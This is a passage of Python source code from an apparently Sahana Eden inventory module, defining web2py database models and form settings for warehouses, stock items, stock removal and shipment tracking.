OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3WarehouseModel",
"S3InventoryModel",
"S3InventoryTrackingLabels",
"S3InventoryTrackingModel",
"S3InventoryAdjustModel",
"inv_tabs",
"inv_rheader",
"inv_rfooter",
"inv_recv_crud_strings",
"inv_recv_rheader",
"inv_send_rheader",
"inv_ship_status",
"inv_tracking_status",
"inv_adj_rheader",
"depends",
"inv_InvItemRepresent",
)
import itertools
from gluon import *
from gluon.sqlhtml import RadioWidget
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
SHIP_STATUS_IN_PROCESS = 0
SHIP_STATUS_RECEIVED = 1
SHIP_STATUS_SENT = 2
SHIP_STATUS_CANCEL = 3
SHIP_STATUS_RETURNING = 4
# Dependency list
depends = ["supply"]
# To pass to global scope
inv_ship_status = {"IN_PROCESS" : SHIP_STATUS_IN_PROCESS,
"RECEIVED" : SHIP_STATUS_RECEIVED,
"SENT" : SHIP_STATUS_SENT,
"CANCEL" : SHIP_STATUS_CANCEL,
"RETURNING" : SHIP_STATUS_RETURNING,
}
SHIP_DOC_PENDING = 0
SHIP_DOC_COMPLETE = 1
TRACK_STATUS_UNKNOWN = 0
TRACK_STATUS_PREPARING = 1
TRACK_STATUS_TRANSIT = 2
TRACK_STATUS_UNLOADING = 3
TRACK_STATUS_ARRIVED = 4
TRACK_STATUS_CANCELED = 5
TRACK_STATUS_RETURNING = 6
inv_tracking_status = {"UNKNOWN" : TRACK_STATUS_UNKNOWN,
"IN_PROCESS" : TRACK_STATUS_PREPARING,
"SENT" : TRACK_STATUS_TRANSIT,
"UNLOADING" : TRACK_STATUS_UNLOADING,
"RECEIVED" : TRACK_STATUS_ARRIVED,
"CANCEL" : TRACK_STATUS_CANCELED,
"RETURNING" : TRACK_STATUS_RETURNING,
}
# Compact JSON encoding
SEPARATORS = (",", ":")
# =============================================================================
class S3WarehouseModel(S3Model):
names = ("inv_warehouse",
#"inv_warehouse_type",
)
def model(self):
T = current.T
#db = current.db
messages = current.messages
NONE = messages["NONE"]
#add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Warehouse Types
#
# tablename = "inv_warehouse_type"
# define_table(tablename,
# Field("name", length=128,
# notnull=True, unique=True,
# label=T("Name")),
# s3_comments(),
# *s3_meta_fields())
# CRUD strings
#crud_strings[tablename] = Storage(
# label_create = T("Add Warehouse Type"),
# title_display = T("Warehouse Type Details"),
# title_list = T("Warehouse Types"),
# title_update = T("Edit Warehouse Type"),
# label_list_button = T("List Warehouse Types"),
# label_delete_button = T("Delete Warehouse Type"),
# msg_record_created = T("Warehouse Type added"),
# msg_record_modified = T("Warehouse Type updated"),
# msg_record_deleted = T("Warehouse Type deleted"),
# msg_list_empty = T("No Warehouse Types currently registered"))
#represent = S3Represent(lookup=tablename, translate=True)
#warehouse_type_id = S3ReusableField("warehouse_type_id", "reference %s" % tablename,
# label = T("Warehouse Type"),
# ondelete = "SET NULL",
# represent = represent,
# requires = IS_EMPTY_OR(
# IS_ONE_OF(db, "inv_warehouse_type.id",
# represent,
# sort=True
# )),
# sortby = "name",
# comment = S3AddResourceLink(c="inv",
# f="warehouse_type",
# label=T("Add Warehouse Type"),
# title=T("Warehouse Type"),
# tooltip=T("If you don't see the Type in the list, you can add a new one by clicking link 'Add Warehouse Type'.")),
# )
#configure(tablename,
# deduplicate = self.inv_warehouse_type_duplicate,
# )
# Tags as component of Warehouse Types
#add_components(tablename,
# inv_warehouse_type_tag={"name": "tag",
# "joinby": "warehouse_type_id",
# }
# )
# ---------------------------------------------------------------------
# Warehouses
#
tablename = "inv_warehouse"
define_table(tablename,
super_link("pe_id", "pr_pentity"),
super_link("site_id", "org_site"),
super_link("doc_id", "doc_entity"),
Field("name", notnull=True,
length=64, # Mayon Compatibility
label = T("Name"),
),
Field("code", length=10, # Mayon compatibility
label = T("Code"),
represent = lambda v: v or NONE,
# Deployments that don't wants warehouse codes can hide them
#readable=False,
#writable=False,
# @ToDo: Deployment Setting to add validator to make these unique
),
self.org_organisation_id(
requires = self.org_organisation_requires(updateable=True),
),
#warehouse_type_id(),
self.gis_location_id(),
Field("phone1", label = T("Phone 1"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("phone2", label = T("Phone 2"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("email", label = T("Email"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(IS_EMAIL())
),
Field("fax", label = T("Fax"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("obsolete", "boolean",
default = False,
label = T("Obsolete"),
represent = lambda opt: \
(opt and [T("Obsolete")] or NONE)[0],
readable = False,
writable = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Warehouse"),
title_display = T("Warehouse Details"),
title_list = T("Warehouses"),
title_update = T("Edit Warehouse"),
title_upload = T("Import Warehouses"),
title_map = T("Map of Warehouses"),
label_list_button = T("List Warehouses"),
label_delete_button = T("Delete Warehouse"),
msg_record_created = T("Warehouse added"),
msg_record_modified = T("Warehouse updated"),
msg_record_deleted = T("Warehouse deleted"),
msg_list_empty = T("No Warehouses currently registered"))
# Filter widgets
filter_widgets = [
S3TextFilter(["name",
"code",
"comments",
"organisation_id$name",
"organisation_id$acronym",
"location_id$name",
"location_id$L1",
"location_id$L2",
],
label=T("Name"),
_class="filter-search",
),
S3OptionsFilter("organisation_id",
label=T("Organization"),
represent="%(name)s",
widget="multiselect",
cols=3,
#hidden=True,
),
S3LocationFilter("location_id",
label=T("Location"),
levels=["L0", "L1", "L2"],
widget="multiselect",
cols=3,
#hidden=True,
),
]
configure(tablename,
deduplicate = self.inv_warehouse_duplicate,
filter_widgets=filter_widgets,
list_fields=["id",
"name",
"organisation_id", # Filtered in Component views
#"type",
#(T("Address"), "location_id$addr_street"),
(messages.COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
#"location_id$L4",
"phone1",
"email"
],
onaccept = self.inv_warehouse_onaccept,
realm_components = ("contact_emergency",
"physical_description",
"config",
"image",
"req",
"send",
"human_resource_site",
"note",
"contact",
"role",
"asset",
"commit",
"inv_item",
"document",
"recv",
"address",
),
super_entity = ("pr_pentity", "org_site"),
update_realm = True,
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict()
# -------------------------------------------------------------------------
#@staticmethod
#def inv_warehouse_type_duplicate(item):
# """ Import item de-duplication """
# if item.tablename == "inv_warehouse_type":
# table = item.table
# name = item.data.get("name", None)
# query = (table.name.lower() == name.lower())
# duplicate = current.db(query).select(table.id,
# limitby=(0, 1)).first()
# if duplicate:
# item.id = duplicate.id
# item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def inv_warehouse_onaccept(form):
"""
Update Affiliation, record ownership and component ownership
"""
current.s3db.org_update_affiliations("inv_warehouse", form.vars)
# ---------------------------------------------------------------------
@staticmethod
def inv_warehouse_duplicate(item):
"""
Import item deduplication, match by name
(Adding location_id doesn't seem to be a good idea)
@param item: the S3ImportItem instance
"""
if item.tablename == "inv_warehouse":
table = item.table
name = "name" in item.data and item.data.name
query = (table.name.lower() == name.lower())
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3InventoryModel(S3Model):
"""
Inventory Management
A module to record inventories of items at a location (site)
"""
names = ("inv_inv_item",
"inv_remove",
"inv_item_id",
"inv_item_represent",
"inv_prep",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
organisation_id = self.org_organisation_id
messages = current.messages
NONE = messages["NONE"]
UNKNOWN_OPT = messages.UNKNOWN_OPT
settings = current.deployment_settings
WAREHOUSE = settings.get_inv_facility_label()
track_pack_values = settings.get_inv_track_pack_values()
inv_source_type = {0: None,
1: T("Donated"),
2: T("Procured"),
}
# =====================================================================
# Inventory Item
#
# Stock in a warehouse or other site's inventory store.
#
# ondelete references have been set to RESTRICT because the inv. items
# should never be automatically deleted
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_inv_item"
self.define_table(tablename,
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
self.super_link("site_id", "org_site",
default = auth.user.site_id if auth.is_logged_in() else None,
empty = False,
label = WAREHOUSE,
ondelete = "RESTRICT",
represent = self.org_site_represent,
readable = True,
writable = True,
# Comment these to use a Dropdown & not an Autocomplete
#widget = S3SiteAutocompleteWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (WAREHOUSE,
# messages.AUTOCOMPLETE_HELP)),
),
self.supply_item_entity_id,
self.supply_item_id(ondelete = "RESTRICT",
required = True,
),
self.supply_item_pack_id(ondelete = "RESTRICT",
required = True,
),
Field("quantity", "double", notnull=True,
default = 0.0,
label = T("Quantity"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
requires = IS_FLOAT_IN_RANGE(0, None),
writable = False,
),
Field("bin", "string", length=16,
label = T("Bin"),
represent = lambda v: v or NONE,
),
# @ToDo: Allow items to be marked as 'still on the shelf but allocated to an outgoing shipment'
Field("status", "integer",
default = 0,
label = T("Status"),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_item_status_opts)
),
),
s3_date("purchase_date",
label = T("Purchase Date"),
),
s3_date("expiry_date",
label = T("Expiry Date"),
),
Field("pack_value", "double",
label = T("Value per Pack"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
readable = track_pack_values,
writable = track_pack_values,
),
# @ToDo: Move this into a Currency Widget for the pack_value field
s3_currency(readable = track_pack_values,
writable = track_pack_values,
),
Field("item_source_no", "string", length=16,
label = self.inv_itn_label,
represent = lambda v: v or NONE,
),
# Organisation that owns this item
organisation_id("owner_org_id",
label = T("Owned By (Organization/Branch)"),
ondelete = "SET NULL",
),
# Original donating Organisation
organisation_id("supply_org_id",
label = T("Supplier/Donor"),
ondelete = "SET NULL",
),
Field("source_type", "integer",
default = 0,
label = T("Type"),
represent = lambda opt: \
inv_source_type.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_source_type)
),
writable = False,
),
Field.Method("total_value",
self.inv_item_total_value),
Field.Method("pack_quantity",
self.supply_item_pack_quantity(tablename=tablename)),
s3_comments(),
*s3_meta_fields())
# CRUD strings
INV_ITEM = T("Warehouse Stock")
ADD_INV_ITEM = T("Add Stock to Warehouse")
current.response.s3.crud_strings[tablename] = Storage(
label_create = ADD_INV_ITEM,
title_display = T("Warehouse Stock Details"),
title_list = T("Stock in Warehouse"),
title_update = T("Edit Warehouse Stock"),
title_report = T("Warehouse Stock Report"),
title_upload = T("Import Warehouse Stock"),
label_list_button = T("List Stock in Warehouse"),
label_delete_button = T("Remove Stock from Warehouse"),
msg_record_created = T("Stock added to Warehouse"),
msg_record_modified = T("Warehouse Stock updated"),
msg_record_deleted = T("Stock removed from Warehouse"),
msg_list_empty = T("No Stock currently registered in this Warehouse"))
# Reusable Field
inv_item_represent = inv_InvItemRepresent()
inv_item_id = S3ReusableField("inv_item_id", "reference %s" % tablename,
label = INV_ITEM,
ondelete = "CASCADE",
represent = inv_item_represent,
requires = IS_ONE_OF(db, "inv_inv_item.id",
inv_item_represent,
orderby="inv_inv_item.id",
sort=True),
comment = DIV(_class="tooltip",
_title="%s|%s" % (INV_ITEM,
T("Select Stock from this Warehouse"))),
script = '''
$.filterOptionsS3({
'trigger':'inv_item_id',
'target':'item_pack_id',
'lookupResource':'item_pack',
'lookupPrefix':'supply',
'lookupURL':S3.Ap.concat('/inv/inv_item_packs/'),
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})''')
# Filter widgets
filter_widgets = [
S3TextFilter(["item_id$name",
"item_pack_id$name",
],
label=T("Item name"),
comment=T("Search for items with this text in the name."),
),
S3OptionsFilter("site_id",
label=T("Facility"),
cols = 2,
hidden = True,
),
S3OptionsFilter("status",
label=T("Status"),
cols = 2,
hidden = True,
),
S3RangeFilter("quantity",
label=T("Quantity range"),
comment=T("Include only items where quantity is in this range."),
ge=10,
hidden = True,
),
S3DateFilter("purchase_date",
label=T("Purchase date"),
comment=T("Include only items purchased within the specified dates."),
hidden = True,
),
S3DateFilter("other_date",
label=T("Expiry date"),
comment=T("Include only items that expire within the specified dates."),
hidden = True,
),
S3OptionsFilter("owner_org_id",
label=T("Owning organization"),
comment=T("Search for items by owning organization."),
represent="%(name)s",
cols=2,
hidden = True,
),
S3OptionsFilter("supply_org_id",
label=T("Donating Organization"),
comment=T("Search for items by donating organization."),
represent="%(name)s",
cols=2,
hidden = True,
),
]
# Report options
if track_pack_values:
rows = ["item_id", "item_id$item_category_id", "currency"]
cols = ["site_id", "owner_org_id", "supply_org_id", "currency"]
fact = ["quantity", (T("Total Value"), "total_value"),]
else:
rows = ["item_id", "item_id$item_category_id"]
cols = ["site_id", "owner_org_id", "supply_org_id"]
fact = ["quantity"]
report_options = Storage(rows = rows,
cols = cols,
fact = fact,
methods = ["sum"],
defaults = Storage(rows = "item_id",
cols = "site_id",
fact = "sum(quantity)",
),
groupby = self.inv_inv_item.site_id,
hide_comments = True,
)
# List fields
if track_pack_values:
list_fields = ["id",
"site_id",
"item_id",
"item_id$code",
"item_id$item_category_id",
"quantity",
"owner_org_id",
"pack_value",
(T("Total Value"), "total_value"),
"currency",
"bin",
"supply_org_id",
"status",
]
else:
list_fields = ["id",
"site_id",
"item_id",
"item_id$code",
"item_id$item_category_id",
"quantity",
"bin",
"owner_org_id",
"supply_org_id",
"status",
]
# Configuration
direct_stock_edits = settings.get_inv_direct_stock_edits()
self.configure(tablename,
# Lock the record so that it can't be meddled with
# - unless explicitly told to allow this
create = direct_stock_edits,
deletable = direct_stock_edits,
editable = direct_stock_edits,
listadd = direct_stock_edits,
deduplicate = self.inv_item_duplicate,
extra_fields = ["quantity",
"pack_value",
"item_pack_id",
],
filter_widgets = filter_widgets,
list_fields = list_fields,
onvalidation = self.inv_inv_item_onvalidate,
report_options = report_options,
super_entity = "supply_item_entity",
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(inv_item_id = inv_item_id,
inv_item_represent = inv_item_represent,
inv_remove = self.inv_remove,
inv_prep = self.inv_prep,
)
# -------------------------------------------------------------------------
@staticmethod
def inv_item_total_value(row):
""" Total value of an inventory item """
if hasattr(row, "inv_inv_item"):
row = row.inv_inv_item
try:
v = row.quantity * row.pack_value
return v
except (AttributeError,TypeError):
# not available
return current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def inv_inv_item_onvalidate(form):
"""
When a inv_inv_item record is created with a source number,
then the source number needs to be unique within the
organisation.
"""
item_source_no = form.vars.item_source_no
if not item_source_no:
return
if hasattr(form, "record"):
record = form.record
if record and \
record.item_source_no and \
record.item_source_no == item_source_no:
# The tracking number hasn't changed so no validation needed
return
db = current.db
s3db = current.s3db
itable = s3db.inv_inv_item
# Was: "track_org_id" - but inv_inv_item has no "track_org_id"!
org_field = "owner_org_id"
query = (itable[org_field] == form.vars[org_field]) & \
(itable.item_source_no == item_source_no)
record = db(query).select(itable[org_field],
limitby=(0, 1)).first()
if record:
org = current.response.s3 \
.org_organisation_represent(record[org_field])
form.errors.item_source_no = current.T("The Tracking Number %s "
"is already used by %s.") % \
(item_source_no, org)
# -------------------------------------------------------------------------
@staticmethod
def inv_remove(inv_rec,
required_total,
required_pack_value = 1,
current_track_total = 0,
update = True,
):
"""
Check that the required_total can be removed from the inv_record
if their is insufficient stock then set up the total to being
what is in stock otherwise set it to be the required total.
If the update flag is true then remove it from stock.
The current total is what has already been removed for this
transaction.
"""
db = current.db
inv_item_table = db.inv_inv_item
siptable = db.supply_item_pack
inv_p_qnty = db(siptable.id == inv_rec.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
inv_qnty = inv_rec.quantity * inv_p_qnty
cur_qnty = current_track_total * inv_p_qnty
req_qnty = required_total * required_pack_value
# It already matches so no change required
if cur_qnty == req_qnty:
return required_total
if inv_qnty + cur_qnty > req_qnty:
send_item_quantity = req_qnty
new_qnty = (inv_qnty + cur_qnty - req_qnty) / inv_p_qnty
else:
send_item_quantity = inv_qnty + cur_qnty
new_qnty = 0
send_item_quantity = send_item_quantity / inv_p_qnty
if update:
# Update the levels in stock
if new_qnty:
db(inv_item_table.id == inv_rec.id).update(quantity = new_qnty)
else:
db(inv_item_table.id == inv_rec.id).update(deleted = True)
return send_item_quantity
# -------------------------------------------------------------------------
@staticmethod
def inv_prep(r):
"""
Used in site REST controllers to Filter out items which are
already in this inventory
"""
if r.component:
if r.component.name == "inv_item":
db = current.db
table = db.inv_inv_item
# Filter out items which are already in this inventory
query = (table.site_id == r.record.site_id) & \
(table.deleted == False)
inv_item_rows = db(query).select(table.item_id)
item_ids = [row.item_id for row in inv_item_rows]
# Ensure that the current item CAN be selected
if r.method == "update":
item = db(table.id == r.args[2]).select(table.item_id,
limitby=(0, 1)).first()
item_ids.remove(item.item_id)
table.item_id.requires.set_filter(not_filterby = "id",
not_filter_opts = item_ids)
elif r.component.name == "send":
# Default to the Search tab in the location selector widget1
current.response.s3.gis.tab = "search"
#if current.request.get_vars.get("select", "sent") == "incoming":
# # Display only incoming shipments which haven't been received yet
# filter = (current.s3db.inv_send.status == SHIP_STATUS_SENT)
# r.resource.add_component_filter("send", filter)
# -------------------------------------------------------------------------
@staticmethod
def inv_item_duplicate(job):
"""
Rules for finding a duplicate:
- Look for a record with the same site,
bin,
supply item and,
pack item
If a item is added as part of an inv_track_item import then the
quantity will be set to zero. This will overwrite any existing
total, if we have a duplicate. If the total was None then
validation would fail (it's a not null field). So if a duplicate
is found then the quantity needs to be removed.
"""
if job.tablename == "inv_inv_item":
table = job.table
data = job.data
site_id = "site_id" in data and data.site_id
item_id = "item_id" in data and data.item_id
pack_id = "item_pack_id" in data and data.item_pack_id
owner_org_id = "owner_org_id" in data and data.owner_org_id
supply_org_id = "supply_org_id" in data and data.supply_org_id
pack_value = "pack_value" in data and data.pack_value
currency = "currency" in data and data.currency
bin = "bin" in data and data.bin
query = (table.site_id == site_id) & \
(table.item_id == item_id) & \
(table.item_pack_id == pack_id) & \
(table.owner_org_id == owner_org_id) & \
(table.supply_org_id == supply_org_id) & \
(table.pack_value == pack_value) & \
(table.currency == currency) & \
(table.bin == bin)
id = duplicator(job, query)
if id:
if "quantity" in data and data.quantity == 0:
job.data.quantity = table[id].quantity
# =============================================================================
class S3InventoryTrackingLabels(S3Model):
""" Tracking Status Labels """
names = ("inv_tracking_status_labels",
"inv_shipment_status_labels",
"inv_itn_label",
"inv_item_status_opts",
)
def model(self):
T = current.T
shipment_status = {SHIP_STATUS_IN_PROCESS: T("In Process"),
SHIP_STATUS_RECEIVED: T("Received"),
SHIP_STATUS_SENT: T("Sent"),
SHIP_STATUS_CANCEL: T("Canceled"),
SHIP_STATUS_RETURNING: T("Returning"),
}
tracking_status = {TRACK_STATUS_UNKNOWN: T("Unknown"),
TRACK_STATUS_PREPARING: T("In Process"),
TRACK_STATUS_TRANSIT: T("In transit"),
TRACK_STATUS_UNLOADING: T("Unloading"),
TRACK_STATUS_ARRIVED: T("Arrived"),
TRACK_STATUS_CANCELED: T("Canceled"),
TRACK_STATUS_RETURNING: T("Returning"),
}
#itn_label = T("Item Source Tracking Number")
# Overwrite the label until we have a better way to do this
itn_label = T("CTN")
settings = current.deployment_settings
return dict(inv_tracking_status_labels = tracking_status,
inv_shipment_status_labels = shipment_status,
inv_itn_label = itn_label,
inv_item_status_opts = settings.get_inv_item_status()
)
# -------------------------------------------------------------------------
def defaults(self):
# inv disabled => label dicts can remain the same, however
return self.model()
# =============================================================================
class S3InventoryTrackingModel(S3Model):
"""
A module to manage the shipment of inventory items
- Sent Items
- Received Items
- And audit trail of the shipment process
"""
names = ("inv_send",
"inv_send_represent",
"inv_send_ref_represent",
"inv_send_controller",
"inv_send_onaccept",
"inv_send_process",
"inv_recv",
"inv_recv_represent",
"inv_recv_ref_represent",
"inv_kit",
"inv_track_item",
"inv_track_item_onaccept",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
settings = current.deployment_settings
person_id = self.pr_person_id
organisation_id = self.org_organisation_id
item_id = self.supply_item_id
inv_item_id = self.inv_item_id
item_pack_id = self.supply_item_pack_id
req_item_id = self.req_item_id
req_ref = self.req_req_ref
tracking_status = self.inv_tracking_status_labels
shipment_status = self.inv_shipment_status_labels
org_site_represent = self.org_site_represent
messages = current.messages
NONE = messages["NONE"]
UNKNOWN_OPT = messages.UNKNOWN_OPT
SITE_LABEL = settings.get_org_site_label()
show_org = settings.get_inv_send_show_org()
show_transport = settings.get_inv_send_show_mode_of_transport()
show_req_ref = settings.get_req_use_req_number()
type_default = settings.get_inv_send_type_default()
time_in = settings.get_inv_send_show_time_in()
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
super_link = self.super_link
is_logged_in = auth.is_logged_in
user = auth.user
s3_string_represent = lambda str: str if str else NONE
send_ref = S3ReusableField("send_ref",
label = T(settings.get_inv_send_ref_field_name()),
represent = self.inv_send_ref_represent,
writable = False,
)
recv_ref = S3ReusableField("recv_ref",
label = T("%(GRN)s Number") % dict(GRN=settings.get_inv_recv_shortname()),
represent = self.inv_recv_ref_represent,
writable = False,
)
purchase_ref = S3ReusableField("purchase_ref",
label = T("%(PO)s Number") % dict(PO=settings.get_proc_shortname()),
represent = s3_string_represent,
)
# ---------------------------------------------------------------------
# Send (Outgoing / Dispatch / etc)
#
send_type_opts = settings.get_inv_shipment_types()
send_type_opts.update(self.inv_item_status_opts)
send_type_opts.update(settings.get_inv_send_types())
tablename = "inv_send"
define_table(tablename,
send_ref(),
req_ref(readable = show_req_ref,
writable = show_req_ref,
),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("site_id", "org_site",
default = user.site_id if is_logged_in() else None,
empty = False,
instance_types = auth.org_site_types,
label = T("From %(site)s") % dict(site=SITE_LABEL),
not_filterby = "obsolete",
not_filter_opts = (True,),
readable = True,
writable = True,
represent = org_site_represent,
updateable = True,
#widget = S3SiteAutocompleteWidget(),
),
Field("type", "integer",
default = type_default,
label = T("Shipment Type"),
represent = lambda opt: \
send_type_opts.get(opt, UNKNOWN_OPT),
requires = IS_IN_SET(send_type_opts),
readable = not type_default,
writable = not type_default,
),
# This is a reference, not a super-link, so we can override
Field("to_site_id", self.org_site,
label = T("To %(site)s") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
represent = org_site_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
sort=True,
not_filterby = "obsolete",
not_filter_opts = (True,),
)),
),
organisation_id(
label = T("To Organization"),
readable = show_org,
writable = show_org,
),
person_id("sender_id",
default = auth.s3_logged_in_person(),
label = T("Sent By"),
ondelete = "SET NULL",
comment = self.pr_person_comment(child="sender_id"),
),
person_id("recipient_id",
label = T("To Person"),
ondelete = "SET NULL",
represent = self.pr_person_phone_represent,
comment = self.pr_person_comment(child="recipient_id"),
),
Field("transport_type",
label = T("Type of Transport"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
),
Field("transported_by",
label = T("Transported by"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Transported by"),
T("Freight company or organisation providing transport"))),
),
Field("transport_ref",
label = T("Transport Reference"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Transport Reference"),
T("Consignment Number, Tracking Number, etc"))),
),
Field("driver_name",
label = T("Name of Driver"),
represent = s3_string_represent,
),
Field("driver_phone",
label = T("Driver Phone Number"),
represent = lambda v: v or "",
requires = IS_EMPTY_OR(s3_phone_requires),
),
Field("vehicle_plate_no",
label = T("Vehicle Plate Number"),
represent = s3_string_represent,
),
Field("time_in", "time",
label = T("Time In"),
represent = s3_string_represent,
readable = time_in,
writable = time_in,
),
Field("time_out", "time",
label = T("Time Out"),
represent = s3_string_represent,
),
s3_datetime(label = T("Date Sent"),
# Not always sent straight away
#default = "now",
represent = "date",
writable = False,
),
s3_datetime("delivery_date",
label = T("Estimated Delivery Date"),
represent = "date",
writable = False,
),
Field("status", "integer",
default = SHIP_STATUS_IN_PROCESS,
label = T("Status"),
represent = lambda opt: \
shipment_status.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(shipment_status)
),
writable = False,
),
s3_comments(),
*s3_meta_fields())
# Filter Widgets
filter_widgets = [
S3TextFilter(["sender_id$first_name",
"sender_id$middle_name",
"sender_id$last_name",
"comments",
"site_id$name",
"send_ref",
"recipient_id$first_name",
"recipient_id$middle_name",
"recipient_id$last_name",
],
label = T("Search"),
comment = T("Search for an item by text."),
),
S3OptionsFilter("to_site_id",
label = T("To Organization"),
comment = T("If none are selected, then all are searched."),
cols = 2,
hidden = True,
),
S3TextFilter("type",
label = T("Shipment Type"),
hidden = True,
),
S3TextFilter("transport_type",
label = T("Type of Transport"),
hidden = True,
),
S3DateFilter("date",
label = T("Date Sent"),
comment = T("Search for a shipment sent between these dates."),
hidden = True,
),
S3DateFilter("delivery_date",
label = T("Estimated Delivery Date"),
comment = T("Search for a shipment which has an estimated delivery between these dates."),
hidden = True,
),
]
# CRUD strings
ADD_SEND = T("Send New Shipment")
crud_strings[tablename] = Storage(
label_create = ADD_SEND,
title_display = T("Sent Shipment Details"),
title_list = T("Sent Shipments"),
title_update = T("Shipment to Send"),
label_list_button = T("List Sent Shipments"),
label_delete_button = T("Delete Sent Shipment"),
msg_record_created = T("Shipment Created"),
msg_record_modified = T("Sent Shipment updated"),
msg_record_deleted = T("Sent Shipment canceled"),
msg_list_empty = T("No Sent Shipments"))
# Reusable Field
send_id = S3ReusableField("send_id", "reference %s" % tablename,
label = T("Send Shipment"),
ondelete = "RESTRICT",
represent = self.inv_send_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_send.id",
self.inv_send_represent,
orderby="inv_send_id.date",
sort=True)),
sortby = "date",
)
# Components
add_components(tablename,
inv_track_item = "send_id",
)
# Custom methods
# Generate Consignment Note
set_method("inv", "send",
method="form",
action=self.inv_send_form)
set_method("inv", "send",
method= "timeline",
action = self.inv_timeline)
# Redirect to the Items tabs after creation
if current.request.controller == "req":
c = "req"
else:
c = "inv"
send_item_url = URL(c=c, f="send", args=["[id]",
"track_item"])
list_fields = ["id",
"send_ref",
"req_ref",
"sender_id",
"site_id",
"date",
"recipient_id",
"delivery_date",
"to_site_id",
"status",
"driver_name",
"driver_phone",
"vehicle_plate_no",
"time_out",
"comments"
]
if time_in:
list_fields.insert(12, "time_in")
if show_transport:
list_fields.insert(10, "transport_type")
configure(tablename,
# It shouldn't be possible for the user to delete a send item
# unless *maybe* if it is pending and has no items referencing it
deletable = False,
filter_widgets = filter_widgets,
onaccept = self.inv_send_onaccept,
onvalidation = self.inv_send_onvalidation,
create_next = send_item_url,
update_next = send_item_url,
list_fields = list_fields,
orderby = "inv_send.date desc",
sortby = [[5, "desc"], [1, "asc"]],
)
# ---------------------------------------------------------------------
# Received (In/Receive / Donation / etc)
#
ship_doc_status = { SHIP_DOC_PENDING : T("Pending"),
SHIP_DOC_COMPLETE : T("Complete") }
recv_type_opts = settings.get_inv_shipment_types()
recv_type_opts.update(settings.get_inv_recv_types())
radio_widget = lambda field, value: \
RadioWidget().widget(field, value, cols = 2)
tablename = "inv_recv"
define_table(tablename,
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("site_id", "org_site",
label = T("%(site)s (Recipient)") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
instance_types = auth.org_site_types,
updateable = True,
not_filterby = "obsolete",
not_filter_opts = (True,),
default = user.site_id if is_logged_in() else None,
readable = True,
writable = True,
empty = False,
represent = org_site_represent,
#widget = S3SiteAutocompleteWidget(),
),
Field("type", "integer",
requires = IS_IN_SET(recv_type_opts),
represent = lambda opt: \
recv_type_opts.get(opt, UNKNOWN_OPT),
label = T("Shipment Type"),
default = 0,
),
organisation_id(label = T("Organization/Supplier")
),
# This is a reference, not a super-link, so we can override
Field("from_site_id", "reference org_site",
label = T("From %(site)s") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
#widget = S3SiteAutocompleteWidget(),
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link = False),
sort=True,
not_filterby = "obsolete",
not_filter_opts = (True,),
)),
represent = org_site_represent
),
s3_date("eta",
label = T("Date Expected"),
writable = False),
s3_datetime(label = T("Date Received"),
represent = "date",
# Can also be set manually (when catching up with backlog of paperwork)
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Date Received"),
# T("Will be filled automatically when the Shipment has been Received"))),
),
send_ref(),
recv_ref(),
purchase_ref(),
req_ref(readable=show_req_ref,
